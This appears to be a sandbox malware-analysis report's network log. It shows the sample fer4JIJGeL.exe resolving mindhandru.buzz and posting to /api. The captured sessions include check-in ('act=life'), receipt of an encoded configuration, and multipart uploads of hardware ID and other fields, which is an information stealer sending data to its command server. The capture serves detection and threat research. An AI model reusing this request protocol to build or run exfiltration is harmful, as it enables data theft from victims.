                                                                                                              Dec 27, 2024 09:00:31.192462921 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.192538023 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.194281101 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.194303036 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.194550037 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.195775986 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196676970 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196717024 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.196810961 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196845055 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.196945906 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196979046 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197077990 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197101116 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197227955 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197258949 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197386026 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197415113 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197427034 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197551966 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197588921 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243350029 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.243557930 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243635893 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243655920 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287343979 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.287543058 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287595987 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287625074 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.331336021 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.331489086 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.375221014 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.375258923 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.558193922 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624634027 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624743938 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624806881 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.624974012 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.625009060 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.686543941 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.686592102 CET44349715172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.686734915 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.687421083 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.687433004 CET44349715172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:34.719114065 CET49715443192.168.2.8172.67.165.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:00:14.749433994 CET | 56320 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:00:14.889317989 CET | 53 | 56320 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 09:00:14.749433994 CET | 192.168.2.8 | 1.1.1.1 | 0x4896 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 09:00:14.889317989 CET | 1.1.1.1 | 192.168.2.8 | 0x4896 | No error (0) | mindhandru.buzz |  | 172.67.165.185 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 09:00:14.889317989 CET | 1.1.1.1 | 192.168.2.8 | 0x4896 | No error (0) | mindhandru.buzz |  | 104.21.11.101 | A (IP address) | IN (0x0001) | false
• mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:16 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: mindhandru.buzz
2024-12-27 08:00:16 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-27 08:00:16 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=epa6va4tdgpdkd4973gd3r9cmi; expires=Tue, 22 Apr 2025 01:46:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPZ2u290Qx142OFdeaGSkHYAqN83SQcK%2FtZtAftrZIwi3ubbMoD9HDL74RbmpntGHs9WhDviXElSJ77nPRJWr76qPycVEFWrXfOUMmDSLcSJmjLMneCaY154ymUCtS0%2Fk7w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6a67b514372-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1603&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1821584&cwnd=242&unsent_bytes=0&cid=697fd9d417fa3d7a&ts=739&x=0"
2024-12-27 08:00:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-27 08:00:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:18 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: mindhandru.buzz
2024-12-27 08:00:18 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 08:00:19 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=o230dq4e2bqmpeiiivu80o3gqa; expires=Tue, 22 Apr 2025 01:46:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Pyq%2F6YJOSLJB%2BjpkM2QK8JPiG%2B58fjuzj0%2BiPM6ujwgLnh3FbqC0AWu806ntYb6L3ghrsbapJHhpn%2Fu%2FwzLg14emkiRJXhEjv02Uo8ZkJAElWphvxUgUB%2BJstzelZNwbsU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6b369c7c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1466&rtt_var=559&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=946&delivery_rate=1941489&cwnd=178&unsent_bytes=0&cid=94d842f5b4f85ed0&ts=996&x=0"
2024-12-27 08:00:19 UTC | 238 | IN | Data Raw: 34 39 31 63 0d 0a 6f 4b 4a 6e 4d 38 2b 45 62 4d 6c 70 47 49 49 77 50 64 41 56 30 71 38 31 71 41 76 6f 70 63 73 46 38 41 55 41 6d 7a 54 68 48 6c 33 62 67 42 45 52 39 62 42 41 36 78 70 39 6f 41 70 4a 6f 6d 43 33 67 78 66 4a 62 38 71 66 72 57 53 63 64 6d 57 33 46 70 64 7a 66 35 72 45 42 6c 2b 38 34 55 44 72 44 47 43 67 43 6d 61 72 4e 37 66 42 46 35 49 70 6a 63 2b 70 5a 4a 78 6e 59 66 42 62 6b 58 49 2b 79 4d 34 41 57 36 72 6e 43 4b 67 46 64 65 64 56 57 4c 46 2f 76 4d 5a 59 77 47 62 4b 69 65 6c 67 69 69 63 36 75 58 6d 45 61 6a 7a 74 77 78 52 59 37 66 6c 41 73 6b 74 39 37 42 49 48 38 6e 53 33 7a 56 6e 4f 62 34 50 4e 6f 32 32 55 5a 6d 54 78 52 49 68 34 4e 63 6a 41 41 31 71 67 37 68 79 6c 44 33 4c 73 55 31 4b 78
Data Ascii: 491coKJnM8+EbMlpGIIwPdAV0q81qAvopcsF8AUAmzThHl3bgBER9bBA6xp9oApJomC3gxfJb8qfrWScdmW3Fpdzf5rEBl+84UDrDGCgCmarN7fBF5Ipjc+pZJxnYfBbkXI+yM4AW6rnCKgFdedVWLF/vMZYwGbKielgiic6uXmEajztwxRY7flAskt97BIH8nS3zVnOb4PNo22UZmTxRIh4NcjAA1qg7hylD3LsU1Kx
2024-12-27 08:00:19 UTC | 1369 | IN | Data Raw: 4e 2f 36 4e 55 4e 49 70 30 6f 66 36 56 5a 46 32 63 2b 78 62 6b 33 70 2f 33 59 34 63 45 61 72 71 54 76 4e 4c 63 75 78 63 57 72 46 34 74 38 78 58 32 47 61 4b 78 4b 46 76 6c 6d 31 74 39 6c 6d 4e 64 6a 6a 4b 79 51 4a 65 71 75 34 49 70 41 67 36 72 68 4a 59 71 6a 66 6f 6a 58 66 61 61 6f 6e 54 70 48 62 53 65 43 7a 67 46 6f 52 77 66 35 71 41 41 31 2b 73 36 77 36 35 41 33 48 72 56 30 32 35 66 72 33 41 56 38 64 6a 68 63 53 70 59 4a 68 74 62 66 4e 53 6a 6e 45 35 77 73 42 46 48 2b 33 68 46 75 74 54 4f 73 4e 58 54 37 56 37 70 6f 39 74 69 6e 62 45 33 75 6c 67 6e 69 63 36 75 56 36 47 66 7a 7a 4a 7a 77 5a 5a 70 76 51 4f 75 51 31 33 35 55 42 5a 74 33 6d 36 7a 6b 58 41 5a 34 7a 45 6f 47 79 62 59 6d 58 39 46 73 30 38 4f 4e 71 41 58 52 47 4d 36 77 57 6e 41 57 33 67 45 6b 44
Data Ascii: N/6NUNIp0of6VZF2c+xbk3p/3Y4cEarqTvNLcuxcWrF4t8xX2GaKxKFvlm1t9lmNdjjKyQJequ4IpAg6rhJYqjfojXfaaonTpHbSeCzgFoRwf5qAA1+s6w65A3HrV025fr3AV8djhcSpYJhtbfNSjnE5wsBFH+3hFutTOsNXT7V7po9tinbE3ulgnic6uV6GfzzJzwZZpvQOuQ135UBZt3m6zkXAZ4zEoGybYmX9Fs08ONqAXRGM6wWnAW3gEkD
2024-12-27 08:00:19 UTC | 1369 | IN | Data Raw: 55 58 47 59 34 7a 49 70 47 76 53 4b 53 4c 2b 54 73 4d 6b 66 2b 6a 44 45 56 4b 6e 70 44 75 6f 42 58 54 6e 52 42 2b 74 4f 61 6d 4e 55 4d 59 70 30 6f 65 6b 5a 70 70 68 63 50 5a 62 67 48 49 78 7a 63 55 4b 57 61 33 6d 41 36 34 50 63 65 74 52 55 72 5a 6c 75 73 31 66 7a 32 69 41 7a 65 6b 70 30 6d 42 36 75 51 37 44 54 53 6a 4a 67 6a 42 53 6f 2b 67 4a 76 55 74 6c 72 6b 73 66 74 58 76 77 6c 52 66 48 59 59 2f 43 70 6d 61 59 61 57 66 7a 57 6f 74 79 50 4e 44 50 41 56 47 68 37 67 53 6d 42 58 37 6f 57 31 53 35 63 62 44 4d 58 59 6f 6e 79 73 43 78 4a 38 6f 6e 56 76 35 61 6a 6e 4e 39 39 38 4d 4c 58 36 72 77 54 72 52 46 59 36 42 56 55 2f 49 76 38 4d 46 65 79 6d 4b 41 77 36 6c 67 6e 32 4a 68 2f 6c 57 4f 65 7a 58 4d 78 77 46 64 70 4f 73 49 71 77 78 2b 35 55 42 61 75 33 75 38
Data Ascii: UXGY4zIpGvSKSL+TsMkf+jDEVKnpDuoBXTnRB+tOamNUMYp0oekZpphcPZbgHIxzcUKWa3mA64PcetRUrZlus1fz2iAzekp0mB6uQ7DTSjJgjBSo+gJvUtlrksftXvwlRfHYY/CpmaYaWfzWotyPNDPAVGh7gSmBX7oW1S5cbDMXYonysCxJ8onVv5ajnN998MLX6rwTrRFY6BVU/Iv8MFeymKAw6lgn2Jh/lWOezXMxwFdpOsIqwx+5UBau3u8
2024-12-27 08:00:19 UTC | 1369 | IN | Data Raw: 2f 4b 32 4f 64 2b 30 6d 42 75 75 51 37 44 64 54 62 51 7a 67 74 59 6f 4f 41 47 72 41 56 33 36 31 52 55 74 58 43 32 77 46 2f 48 62 49 6e 47 72 57 32 41 5a 47 6e 7a 57 34 6b 38 63 59 4c 48 48 52 48 31 70 69 6d 6e 49 6d 72 37 51 45 6e 79 61 50 37 55 46 38 31 6c 79 70 2f 70 5a 4a 31 75 62 66 46 65 6a 48 4d 37 7a 4d 59 44 58 4b 6a 70 42 4c 6b 44 64 4f 31 5a 55 4c 6c 6c 73 4d 42 54 78 6d 32 43 7a 4b 4d 6e 33 43 64 6c 34 52 62 62 50 41 72 50 7a 77 56 53 75 36 59 52 35 52 49 36 35 31 34 66 36 6a 65 38 77 31 66 46 5a 59 62 4d 6f 57 61 65 61 57 58 38 58 34 74 30 4c 63 50 45 44 56 43 6a 36 51 2b 76 44 6e 2f 6b 56 56 75 30 65 50 43 44 46 38 31 78 79 70 2f 70 53 4c 56 53 49 4e 68 73 77 32 4e 78 32 34 41 43 58 65 32 2b 54 71 63 49 64 75 68 64 57 62 74 37 75 73 52 63 78
Data Ascii: /K2Od+0mBuuQ7DdTbQzgtYoOAGrAV361RUtXC2wF/HbInGrW2AZGnzW4k8cYLHHRH1pimnImr7QEnyaP7UF81lyp/pZJ1ubfFejHM7zMYDXKjpBLkDdO1ZULllsMBTxm2CzKMn3Cdl4RbbPArPzwVSu6YR5RI6514f6je8w1fFZYbMoWaeaWX8X4t0LcPEDVCj6Q+vDn/kVVu0ePCDF81xyp/pSLVSINhsw2Nx24ACXe2+TqcIduhdWbt7usRcx
2024-12-27 08:00:19 UTC | 1369 | IN | Data Raw: 71 59 35 64 6f 59 2f 68 51 6b 58 73 32 30 4d 34 49 58 71 58 75 42 36 6f 50 66 2b 31 55 55 37 68 32 74 38 4e 5a 77 69 6e 45 68 36 35 2f 30 6a 38 69 32 45 61 59 62 69 6e 50 34 51 68 65 37 66 6c 41 73 6b 74 39 37 42 49 48 38 6e 36 69 79 56 72 59 59 49 33 4a 70 6d 53 41 5a 6d 2f 79 52 49 52 7a 4f 38 58 4d 41 31 36 72 35 77 75 68 42 33 33 6c 57 56 43 2b 4e 2f 36 4e 55 4e 49 70 30 6f 65 48 62 49 46 77 59 66 64 64 6c 57 64 2f 33 59 34 63 45 61 72 71 54 76 4e 4c 65 65 74 5a 57 37 4a 37 73 4d 6c 61 79 6e 75 46 77 4b 35 75 6d 58 56 6f 2f 6c 47 49 64 44 54 4e 78 68 64 64 6f 2f 51 4c 75 52 6b 36 72 68 4a 59 71 6a 66 6f 6a 57 48 4e 65 5a 72 45 36 31 61 45 5a 48 54 79 57 34 38 38 49 49 7a 5a 52 56 61 68 70 6c 62 72 44 58 58 70 55 56 43 7a 66 72 7a 41 55 73 4e 73 69 38
Data Ascii: qY5doY/hQkXs20M4IXqXuB6oPf+1UU7h2t8NZwinEh65/0j8i2EaYbinP4Qhe7flAskt97BIH8n6iyVrYYI3JpmSAZm/yRIRzO8XMA16r5wuhB33lWVC+N/6NUNIp0oeHbIFwYfddlWd/3Y4cEarqTvNLeetZW7J7sMlaynuFwK5umXVo/lGIdDTNxhddo/QLuRk6rhJYqjfojWHNeZrE61aEZHTyW488IIzZRVahplbrDXXpUVCzfrzAUsNsi8
2024-12-27 08:00:19 UTC | 1369 | IN | Data Raw: 56 57 48 69 46 70 77 79 4a 6f 4c 48 43 52 48 31 70 67 32 73 43 48 76 71 57 31 4f 39 63 4c 54 66 58 63 31 37 69 38 61 69 61 70 35 6e 62 2f 52 63 67 6e 55 79 7a 73 30 43 56 71 4c 6a 54 75 56 4c 66 66 67 53 42 2f 4a 57 76 63 5a 62 6b 54 50 4b 32 4f 64 2b 30 6d 42 75 75 51 37 44 66 44 58 48 79 67 68 53 6f 75 55 63 71 67 31 6f 34 46 39 56 6f 48 32 37 79 46 72 48 5a 49 6e 42 72 32 79 65 64 57 76 35 56 59 67 38 63 59 4c 48 48 52 48 31 70 69 32 38 48 58 44 6e 58 6b 6d 35 64 72 50 62 57 74 6f 70 78 49 65 34 59 49 4d 6e 4f 75 39 47 6c 48 73 67 6a 4e 6c 46 56 71 47 6d 56 75 73 4e 63 2b 5a 56 57 62 78 6c 74 63 74 59 78 57 43 44 77 36 46 6b 6b 6d 4e 6d 2f 6c 4f 41 63 44 54 46 77 77 70 56 70 4f 67 48 70 45 73 30 6f 46 56 48 38 69 2f 77 37 45 7a 4a 5a 59 65 48 74 69 6d
                                                                                                              Data Ascii: VWHiFpwyJoLHCRH1pg2sCHvqW1O9cLTfXc17i8aiap5nb/RcgnUyzs0CVqLjTuVLffgSB/JWvcZbkTPK2Od+0mBuuQ7DfDXHyghSouUcqg1o4F9VoH27yFrHZInBr2yedWv5VYg8cYLHHRH1pi28HXDnXkm5drPbWtopxIe4YIMnOu9GlHsgjNlFVqGmVusNc+ZVWbxltctYxWCDw6FkkmNm/lOAcDTFwwpVpOgHpEs0oFVH8i/w7EzJZYeHtim
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 78 61 45 5a 48 2b 61 67 43 56 61 75 2b 4d 4a 76 55 6c 50 34 31 78 52 74 57 48 77 30 6d 69 45 4b 59 58 64 36 54 2b 72 66 69 4c 2b 57 73 4d 6b 66 39 66 48 42 56 61 33 38 41 6d 6e 47 6e 48 74 58 6e 32 39 63 4b 62 4f 57 4d 6c 34 67 34 75 69 61 74 49 70 49 76 35 4f 77 79 52 2f 37 63 63 54 55 6f 4c 6c 48 36 4a 4c 4e 4b 42 56 53 66 49 76 38 50 4d 58 32 47 71 61 78 4b 5a 32 72 43 63 36 34 47 6a 44 64 79 6e 46 30 41 5a 48 70 75 73 43 75 6a 55 36 75 41 59 4e 34 43 58 69 6e 30 69 4b 64 72 57 4a 36 57 62 53 50 31 76 67 46 70 55 38 5a 35 43 4f 52 55 50 74 76 6b 37 73 43 47 6a 79 56 46 79 6b 64 50 66 7a 61 65 31 2f 67 4d 43 35 59 49 56 6f 49 72 63 57 6a 44 78 6e 2b 34 41 4d 56 72 62 33 47 4b 59 62 66 61 42 74 45 66 4a 76 38 4a 55 58 2f 32 71 45 79 61 35 78 67 79 70 46
                                                                                                              Data Ascii: xaEZH+agCVau+MJvUlP41xRtWHw0miEKYXd6T+rfiL+WsMkf9fHBVa38AmnGnHtXn29cKbOWMl4g4uiatIpIv5OwyR/7ccTUoLlH6JLNKBVSfIv8PMX2GqaxKZ2rCc64GjDdynF0AZHpusCujU6uAYN4CXin0iKdrWJ6WbSP1vgFpU8Z5CORUPtvk7sCGjyVFykdPfzae1/gMC5YIVoIrcWjDxn+4AMVrb3GKYbfaBtEfJv8JUX/2qEya5xgypF
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 73 42 2f 4d 45 49 58 75 48 6f 42 61 73 4d 61 76 5a 4a 45 37 70 30 71 74 64 70 39 45 4b 47 77 61 35 39 6c 57 46 45 32 52 62 4e 50 44 43 43 6d 44 77 52 35 61 59 78 35 55 74 69 6f 41 6f 66 68 33 53 2b 77 31 44 63 65 4d 66 76 69 6c 32 6f 4a 55 37 2b 51 38 46 49 4f 4e 4c 52 44 6c 79 68 70 6b 44 72 44 54 71 34 41 68 48 79 63 36 47 4e 44 35 6f 37 30 5a 4c 36 4d 4d 49 31 66 62 64 50 77 32 70 2f 6d 70 4a 4c 45 62 2b 6d 56 75 74 4d 65 66 4a 41 57 62 46 68 73 34 70 70 39 45 36 45 77 4b 68 78 67 6e 42 74 78 32 69 57 66 7a 48 4d 78 78 4e 41 37 61 68 4f 70 45 73 69 32 52 49 58 38 6b 6a 2b 6a 55 2b 4b 4d 63 72 79 71 6d 6d 63 59 48 54 6f 47 36 52 79 4f 4d 50 57 46 55 61 69 70 6b 44 72 44 54 71 34 41 42 48 79 63 36 47 4e 44 35 6f 37 30 5a 4c 36 4d 4d 49 31 66 62 64 50 77
                                                                                                              Data Ascii: sB/MEIXuHoBasMavZJE7p0qtdp9EKGwa59lWFE2RbNPDCCmDwR5aYx5UtioAofh3S+w1DceMfvil2oJU7+Q8FIONLRDlyhpkDrDTq4AhHyc6GND5o70ZL6MMI1fbdPw2p/mpJLEb+mVutMefJAWbFhs4pp9E6EwKhxgnBtx2iWfzHMxxNA7ahOpEsi2RIX8kj+jU+KMcryqmmcYHToG6RyOMPWFUaipkDrDTq4ABHyc6GND5o70ZL6MMI1fbdPw
                                                                                                              2024-12-27 08:00:19 UTC1369INData Raw: 4b 46 56 79 69 34 55 79 4c 44 47 7a 6a 45 68 48 79 65 2f 43 56 46 38 74 6a 6d 73 71 6d 59 4e 35 67 65 50 34 57 7a 54 77 78 67 70 68 46 55 4b 66 32 41 36 51 4d 4e 75 5a 63 55 66 4a 6f 2f 74 51 58 33 43 6e 53 6c 4f 63 6e 67 43 63 36 75 52 47 41 62 69 33 45 77 78 4e 53 36 74 67 77 68 68 6c 39 38 46 45 64 67 33 71 30 32 30 4c 4a 65 59 33 35 6c 30 71 41 59 48 4c 36 46 4c 4a 71 50 4d 4c 4f 41 68 48 6a 70 68 62 72 55 7a 72 4e 51 46 69 69 64 50 43 44 46 38 59 70 30 6f 65 6b 64 5a 56 33 59 62 56 52 6d 58 74 2f 33 59 34 63 45 62 75 6d 56 76 68 46 4f 76 49 53 42 2f 49 77 76 73 42 57 79 57 65 4a 31 62 74 68 6b 58 46 68 76 6d 69 39 55 53 33 46 30 41 59 54 6e 4f 73 4b 76 52 35 35 38 46 56 68 6a 46 71 69 79 6b 66 4a 4b 36 62 41 70 47 75 73 57 56 58 6f 55 5a 4d 2b 47 63
                                                                                                              Data Ascii: KFVyi4UyLDGzjEhHye/CVF8tjmsqmYN5geP4WzTwxgphFUKf2A6QMNuZcUfJo/tQX3CnSlOcngCc6uRGAbi3EwxNS6tgwhhl98FEdg3q020LJeY35l0qAYHL6FLJqPMLOAhHjphbrUzrNQFiidPCDF8Yp0oekdZV3YbVRmXt/3Y4cEbumVvhFOvISB/IwvsBWyWeJ1bthkXFhvmi9US3F0AYTnOsKvR558FVhjFqiykfJK6bApGusWVXoUZM+Gc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:20 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AVT6GUCXU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12792
Host: mindhandru.buzz
2024-12-27 08:00:20 UTC | 12792 | OUT | Data Raw: 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 56 54 36 47 55 43 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
Data Ascii: --AVT6GUCXUContent-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--AVT6GUCXUContent-Disposition: form-data; name="pid"2--AVT6GUCXUContent-Disposition: form-data; name="lid"PsFKDg--pablo--AVT6GUCXUContent-Disp
2024-12-27 08:00:21 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:00:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gmv4qness0bvrcsrg79j7gvh91; expires=Tue, 22 Apr 2025 01:47:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0v46t7BALk%2BsGbQz0LzhO0FAMFMWhS5EqkuvAEhQx6dL8yxyO2CUVKL1rc%2F335U9bBv0zDoPVj7kuEYeLngILPw9FNLlDl9SsVSS6i0CCv2Uunxff76kgmt8jb1aT9zq0og%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87c6c34c731a13-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1832&rtt_var=767&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13722&delivery_rate=1593886&cwnd=169&unsent_bytes=0&cid=e24c35a4ff7dcf72&ts=898&x=0"
2024-12-27 08:00:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 08:00:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49708 | 172.67.165.185 | 443 | 7656 | C:\Users\user\Desktop\fer4JIJGeL.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:00:23 UTC | 271 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3PQAHZZ6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15015
Host: mindhandru.buzz
